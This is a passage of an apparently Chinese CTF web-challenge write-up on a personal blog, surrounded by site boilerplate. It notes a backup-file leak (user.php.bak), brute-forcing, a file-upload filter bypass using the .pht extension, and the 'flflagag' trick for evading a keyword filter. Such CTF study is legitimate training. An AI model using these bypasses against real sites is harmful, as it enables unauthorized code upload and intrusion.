<p>因为访问user.php在网页中没有回显，我们想到下载下备份就可以不用网页方式打开，所以user.php要自然想到user.php.bak</p>
<p>然后爆破。</p>
<p>然后我们还要手动添加注释内容中的表单，不然提交不了。</p>
<p>剩下的就是文件上传的常见套路啦。</p>
<p>Apache 配置文件中会有</p>
<blockquote>
<p>.+.ph(p[345]?|t|tml)</p>
<p>.+.phps$</p>
</blockquote>
<p>此类的正则表达式，文件名满足即可被当做php解析，也就是说<code>php3，php4，php5，pht，phtml,phps都</code>是可以被解析的。所以构造pht</p>
<p>通过URL访问view.php,得到提示通过file进行传参,输入flag 发现没有得到结果 得出对flag进行了相应的过滤 最后尝试得到<br>flflagag 合法。</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        Author:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">hz</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        Link:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://example.com/2022/02/06/i%E6%98%A5%E7%A7%8B-1/">http://example.com/2022/02/06/i%E6%98%A5%E7%A7%8B-1/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        Reprint policy:
                    </i>
                </span>
                <span class="reprint-info">
                    All articles in this blog are used except for special statements
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    reprint policy. If reproduced, please indicate source
                    <a href="/about" target="_blank">hz</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>Copied successfully, please follow the reprint policy of this article</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">more</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/ctf%E9%A2%98%E7%9B%AE-web/">
                                    <span class="chip bg-color">ctf题目--web</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;Previous</div>
            <div class="card">
                <a href="/2022/02/06/%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/3.jpg" class="responsive-img" alt="正则表达式">
                        
                        <span class="card-title">正则表达式</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2022-02-06
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            hz
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E7%90%86%E8%AE%BA%E7%9F%A5%E8%AF%86/">
                        <span class="chip bg-color">理论知识</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                Next&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2022/02/04/bugku-3/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/20.jpg" class="responsive-img" alt="bugku-3">
                        
                        <span class="card-title">bugku-3</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-02-04
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            hz
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/ctf%E9%A2%98%E7%9B%AE-web/">
                        <span class="chip bg-color">ctf题目--web</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;TOC</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2022</span>
            
            <span id="year">2019</span>
            <a href="/about" target="_blank">hz</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;Total visits:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;Total visitors:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/shianer" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:292595085@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=292595085" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 292595085" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;Search</span>
            <input type="search" id="searchInput" name="s" placeholder="Please enter a search keyword"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
